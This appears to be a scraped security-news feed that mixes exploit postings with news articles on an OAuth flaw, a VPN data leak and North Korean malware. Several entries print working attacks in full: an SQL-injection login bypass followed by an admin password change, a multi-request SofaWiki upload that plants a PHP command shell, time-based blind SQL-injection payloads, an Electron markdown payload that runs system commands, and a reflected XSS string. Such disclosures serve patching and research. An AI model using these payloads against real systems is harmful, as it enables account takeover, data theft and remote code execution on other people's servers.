2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

A cybersecurity vulnerability found in an implementation of the social login functionality opens the door to account takeovers and more.

A vulnerability in the implementation of the Open Authorization (OAuth) standard that websites and applications use to connect to Facebook, Google, Apple, Twitter, and more could allow attackers to take over user accounts, access and/or leak sensitive information, and even commit financial fraud.

OAuth comes into play when a user logs in to a website and clicks on a link to log in with another social media account, such as "Log in with Facebook" or "Log in with Google" — a feature that many sites use to allow cross-platform authentication. A team from API security firm Salt Security's Salt Labs discovered the flaw, tracked as CVE-2023-28131, in the OAuth implementation in Expo, an open source framework for developing native mobile apps for iOS, Android, and other Web platforms using a single codebase.

Specifically, the flaw potentially could affect any users that use various and social media accounts to log into an online service that uses the framework, the researchers revealed in a blog post published May 24.

The vulnerability is the second — and more impactful — one that Salt researchers have found in an online platform's implementation of OAuth, which is proving to be a tricky standard to implement securely. In March, Salt discovered a flaw in Booking.com's implementation of OAuth that could have allowed attackers to take over user accounts and gain full visibility into their personal or payment-card data, as well as log in to accounts on the website's sister platform, Kayak.com.

**Third-Party Risk With OAuth Implementation**

The flaw in Expo could have had a much wider impact than the Booking.com flaw, because of Expo's wide install base, Aviad Carmel, Salt security researcher, tells Dark Reading.

"Because this second OAuth vulnerability was discovered in a third-party framework used by hundreds of companies, the potential exposure was far greater," he says. "It could have impacted the OAuth implementations of hundreds of websites and apps."

Moreover, OAuth is becoming a de facto authentication standard in modern service-based architectures, as well as in emerging artificial intelligence (AI)-based platforms. This inherently means any vulnerabilities in OAuth implementations have a broad reach. In fact, in other research unveiled May 24, software-as-a-service (SaaS) security firm DoControl revealed that 24 percent of third-party AI apps require risky OAuth permissions.

Expo patched CVE-2023-28131 within hours after Salt researchers flagged the issue, and developers maintaining the platform recommended in a blog post detailing the flaw that customers update their Expo deployments to fully mitigate the risk.

However, the mounting list of OAuth vulnerabilities and the overall complexity of correctly configuring the standard that they highlight suggest that more websites and apps could have undiscovered flaws lurking beneath their surface.

The findings also demonstrate how enterprises are adversely and broadly affected when third-party frameworks introduce API vulnerabilities into their environment, often without them knowing. This puts customers at risk for credential leaks or account takeover, and gives threat actors a platform from which to launch further attacks, the researchers said.

**Exploiting the Expo Flaw**

When a user clicks on an OAuth-enabled link to log in to Site A with a social media account, Site A will then open a new window to Facebook, Google, or whatever trusted account is being used. If it's the user's first time visiting Site A, the social media page will ask for permission to share details with Site A. If the user has gone through the process before, the social media site will automatically authenticate the user to Site A.

Salt Labs researchers discovered CVE-2023-28131 in Codeacademy.com, an online platform that offers free coding classes across a dozen programming languages. Companies including Google, LinkedIn, Amazon, Spotify, and others use the site to help train employees, and the site has around 100 million users. The researchers ultimately exploited the flaw to gain complete control of Codeacademy.com accounts, they said.

The vulnerability in the OAuth implementation within Expo relates to the social sign-in process, Carmel tells Dark Reading. "When users sign in using their Facebook or Google credentials, Expo acts as an intermediary and transfers the user's credentials to the target website," he says.

Attackers could have exploited CVE-2023-28131 by intercepting this flow and manipulating Expo to send the user credentials to a malicious domain instead of the intended destination, Carmel explains.

This exploitation could have led to leaks of personal data or even financial fraud if attackers used credentials to log into users' financial accounts. Threat actors also could potentially have performed actions on behalf of users on their social media accounts, Carmel says.

**Why OAuth Is Tricky**

OAuth's popularity stems from how it can provide a much more seamless user experience for people when interacting with frequently used websites. However, it has a complex, technical back-end that can lead to implementation mistakes, creating security gaps that are ripe for exploitation, the researchers said.

To secure an OAuth implementation, then, an organization must understand how OAuth functions and which endpoints can receive user inputs, Carmel says.

"Attackers may attempt to manipulate these inputs, so validating each one is essential," he advises. "This can be achieved by maintaining a whitelist of predetermined values or implementing other strict validation methods."

Because of how complex OAuth implementations are proving to be, Salt Security plans to release a best-practice guide in the future to help enterprises security their OAuth implementations effectively, Carmel adds.

OAuth Flaw in Expo Platform Affects Hundreds of Third-Party Sites, Apps

By Habiba Rashid
SuperVPN is the same free VPN service provider that leaked customers' data back in May 2022.
This is a post from HackRead.com Read the original post: Free VPN Service SuperVPN Exposes 360 Million User Records

This time, SuperVPN has exposed a whopping 133 GB of data, including personal details of its unsuspecting users, such as IP addresses.

In a recent cybersecurity incident, security researcher Jeremiah Fowler discovered a significant data breach in a non-password-protected database associated with a popular free VPN service.

The exposed database contained a staggering 360,308,817 records, totalling 133 GB in size. These records included a wide range of sensitive information, including user email addresses, original IP addresses, geolocation data, and server usage records.

Additionally, the breach revealed secret keys, Unique App User ID numbers, and UUID numbers, which can be utilized to identify further useful information.

Other information found in the database encompassed phone or device models, operating systems, internet connection types, and VPN application versions. Furthermore, refund requests and paid account details were also present in the breach.

Type of leaked data (VPNmentor)

While SuperVPN claims that it does not store user logs, the leaked data shows otherwise and contradicts the company’s policy. This also goes to show that “_Almost Every Major Free VPN Service is a Glorified Data Farm_.”

With the increasing concerns over online privacy and security, the demand for VPN services has soared in recent years. Consequently, the market has witnessed a significant rise in the number of VPN apps available to users.

However, this surge in offerings has resulted in an alarming proportion of VPN apps that are unreliable and fail to provide the expected level of privacy and security. This results in a counterproductive user experience since a lack of adequate security protocols puts their information at risk of being leaked in a data breach.

The majority of records in the exposed database, according to VPNmentor’s report, were associated with SuperVPN, a free VPN application available on both the Apple and Google application stores.

Furthermore, researchers noted two apps named SuperVPN listed, each credited to separate developers. Qingdao Leyou Hudong Network Technology Co. was the developer behind SuperVPN for iOS, iPad, and macOS, while SuperSoft Tech developed the second app with the same name.

However, it is important to note that this is NOT the first time SuperVPN has been blamed for leaking the personal details of its unsuspecting users. In fact, as reported by Hackread.com in May 2022, SuperVPN was among the list of free VPN services that leaked details of over 21 million users. Other free VPN services to leak customer data included GeckoVPN and ChatVPN. In total, the database contained 10GB worth of data that was leaked on Telegram.

In the report published by vpnMentor, Fowler noticed that SuperVPN’s customer support emails were linked to StormVPN, Luna VPN, RocketVPN and GhostVPN. Additionally, references to each of these VPN providers were observed within the database.

Type of leaked data (VPNmentor)

Although there is no way to confirm that they’re all owned by the same company, it would not come as a surprise if that were the case. The proliferation of unreliable VPN apps can be attributed to profit-driven developers seeking to capitalize on the growing demand for privacy and security.

The VPN industry has become highly lucrative, with millions of users worldwide seeking reliable solutions to safeguard their online presence. In this climate, some developers prioritize monetary gains over user safety, focusing on quick and inexpensive development, marketing, and distribution of VPN apps.

Therefore, for a single company to produce multiple VPN applications with different names and slightly varying user experiences would not be unlikely since that would allow it to cast a wider net over the users scouring for a suitable VPN provider.

When opting for a free VPN service, it’s essential to exercise caution and consider certain red flags that indicate potential risks. These include:

1.  Unclear data collection and usage policies: Verify that the VPN service doesn’t log your internet activity to avoid the risk of data being sold to advertisers or third parties.
2.  Lack of transparency: Pay attention to the absence of an “About Us” section on the VPN provider’s official website, as this can indicate a lack of information about who handles your data.
3.  DNS-leak protection: Ensure that the VPN service offers DNS-leak protection to prevent your internet service provider from seeing your online activities.
4.  Weak encryption: Avoid VPNs that offer encryption weaker than 128-bit or 256-bit AES, as this increases the risk of your data being compromised.
5.  Negative reviews: Read user reviews and consult reputable review sites to gauge the experiences and concerns of other users before choosing a VPN service.

The proliferation of VPN apps presents both opportunities and challenges for users seeking privacy and security in their online activities. While the market offers a wide range of reliable VPN solutions, the rising number of unreliable apps calls for caution and informed decision-making.

By understanding the factors contributing to the excess of VPN apps, identifying the risks associated with their usage, and implementing measures to mitigate these risks, users can make more informed choices to protect their online privacy and security.

**RELATED ARTICLES**

1.  Beware! This malware hides behind free VPNs
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Leaked database of UFO VPN destroyed by hackers
4.  Mullvad VPN and Tor Project Release Mullvad Browser
5.  VPN firm that claims 0 logs policy leaks 20m user logs

Free VPN Service SuperVPN Exposes 360 Million User Records

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Yank Note version 3.52.1 suffers from an arbitrary code execution vulnerability.

    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution# Date: 2023-04-27# Exploit Author: 8bitsec# CVE: CVE-2023-31874# Vendor Homepage: yank-note.com# Software Link: https://github.com/purocean/yn# Version: 3.52.1# Tested on: [Ubuntu 22.04 | Mac OS 13]Release Date: 2023-04-27Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacementTechnical Details & Description:A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.Proof of Concept (PoC):Arbitrary code execution:Create a markdown file (.md) in any text editor and write the following payload.Mac:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">Ubuntu:<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">Opening the file in Yank Note will auto execute the Calculator application.

Yank Note 3.52.1 Arbitrary Code Execution

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

Wondershare Filmora 12 (Build 12.2.1.2088) was discovered to contain an unquoted service path vulnerability via the component NativePushService. This vulnerability allows attackers to launch processes with elevated privileges.

CVE-2023-31747: A new much less corrupt form of democracy

SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

CVE-2023-31752: bug_report/SQLi-2.md at main · 4O4NtFd/bug_report

The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.
"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom

The North Korean advanced persistent threat (APT) group known as **Kimsuky** has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation.

"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.

The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors.

Kimsuky, active since 2012, has a track record of striking organizations and individuals who are of strategic interest to North Korea.

The intelligence collection missions have recently involved the use of another reconnaissance tool called ReconShark, as detailed by SentinelOne earlier this month.

The latest activity cluster associated with the group commenced on May 5, 2023, and leverages a variant of RandomQuery that's specifically designed to enumerate files and siphon sensitive data.

RandomQuery, alongside FlowerPower and AppleSeed, are among the most frequently distributed tools in Kimsuky's arsenal, with the former functioning as an information stealer and a conduit for distributing remote access trojans like TutRAT and xRAT.

The attacks begin with phishing emails that purport to be from Daily NK, a prominent Seoul-based online publication that covers North Korean affairs, to entice potential targets into opening a Microsoft Compiled HTML Help (CHM) file.

It's worth noting at this stage that CHM files have also been adopted as a lure by a different North Korean nation-state actor referred to as ScarCruft.

Launching the CHM file leads to the execution of a Visual Basic Script that issues a HTTP GET request to a remote server to retrieve the second-stage payload, a VBScript flavor of RandomQuery.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server.

"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.

"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."

The findings arrive days after the AhnLab Security Emergency response Center (ASEC) uncovered a watering hole attack mounted by Kimsuky that entails setting up a lookalike webmail system used by national policy research institutes to harvest credentials entered by victims.

In a related development, Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers to drop the Metasploit Meterpreter post-exploitation framework, which is then used to deploy a Go-based proxy malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple